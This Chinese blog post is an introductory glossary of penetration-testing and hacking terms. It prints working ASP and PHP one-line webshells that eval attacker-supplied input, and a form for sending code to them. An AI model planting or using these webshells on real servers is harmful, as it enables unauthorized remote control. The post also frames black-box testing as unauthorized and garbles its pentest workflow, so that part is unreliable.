特殊时期,大家一定要保重身体。增强自身免疫力,一切都会过去,一起加油!!!

黑客攻防之渗透测试相关术语解析

黑客攻防 zchao 1184℃ 0评论

下面正式开始学习黑客攻防的技术,从此你也踏上了一条“不归路”,既然对黑客有兴趣,那就请坚持下去,最后你会不一样和所有人

渗透测试相关概念

黑客(Cracker):技术高,纵横于网络上的高级程序员
骇客:技术可能一般,工具使用的好
红客(Honcker):中国特色红客
白帽子:从事网络安全,系统安全
黑帽子:研究木马,操作系统,寻找漏洞,个人意志
灰帽子:研究木马,操作系统,寻找漏洞,出发点主要是个人意志(自由性强)

1.脚本(asp,php,jsp)
2.html(css,js,html)
3.HTTP协议
4.CMS(B/S)
5.MD5

肉鸡:被黑客入侵并被长期驻扎的计算机或服务器
抓鸡:利用使用大量的程序漏洞,使用自动化方式获取肉鸡的行为
Webshell:痛过Web入侵的脚本工具,对网站服务进行一定程度的控制

漏洞:硬件,软件,协议等可利用的安全缺陷
一句话木马:痛过向服务端提交一句简短的代码,
配合本地客户端实现webshell功能的木马
<%eval request(“pass”)%>
<%execute(request(“pass”))%>
request(“pass”)接收客户端提交的数据,pass为执行命令的参数值
eval/execute 函数执行客户端命令的内容

PHP一句话木马:<?php eval($_POST[cracer]);?>
<form method=post action=”http://木马地址”>
<textarea name=cracer>
//php代码
phpinfo();
</textarea>
<input type=submit>
</form>

提权:操作系统低权限的账户将自己提升为管理员权限使用的方法。
后门:对主机长期控制,在机器上种植的一段程序或留下的一个“入口”
跳板:使用肉鸡IP来实施攻击其他目标,隐藏自己的身份信息(使用别人电脑)
旁站入侵:同服务器下的网站入侵,通过提权跨目录拿网站权限;
常用的旁站查询工具:WebRobot,御剑,明小子,web在线查询
C段入侵:同C段下服务器入侵,如192.168.1.253入侵192.168.1.*任意一台机器,通过嗅探获取信息
常用的工具有:在windows下Cain,在UNIX下Sniffit,Snoop,Tcpdump,Dsniff等

黑盒测试:未授权的情况下,模拟黑客的攻击方法和思维方式
黑盒测试能力:OS,Database,Script,code,思路,社工
白盒测试:从内部发起
APT攻击(Advanced Persistent Threat):高级可持续性攻击,政府和组织

渗透测试流程:
明确目标(确定范围,确定规则,确定需求)
收集信息(基础信息,系统信息,应用信息,版本信息,服务信息,人员信息,防护信息)
漏洞探测(系统漏洞,WebServer漏洞,Web应用漏洞,其他端口服务漏洞,通信安全)
漏洞验证(自动化验证,手工验证,试验验证,登陆猜解,业务漏洞验证,公开资源的利用)
形成报告(精准打击,绕过防御机制,定制攻击路径,绕过检测机制,攻击代码)
信息整理(实施攻击,获取内部信息,进一步渗透,持续性存在,清理痕迹)
获取所需(整理渗透工具,整理收集信息)
信息分析

搜索信息是关键
搜集0day(破解信息漏洞等)

安装虚拟机(在电脑知识——>虚拟机中有介绍)

这才刚刚开始,第一步已经坚持了,那么继续走下去……

转载请注明:zchao博客之家 » 黑客攻防之渗透测试相关术语解析

喜欢 (0)or分享 (0)

您必须 登录 才能发表评论!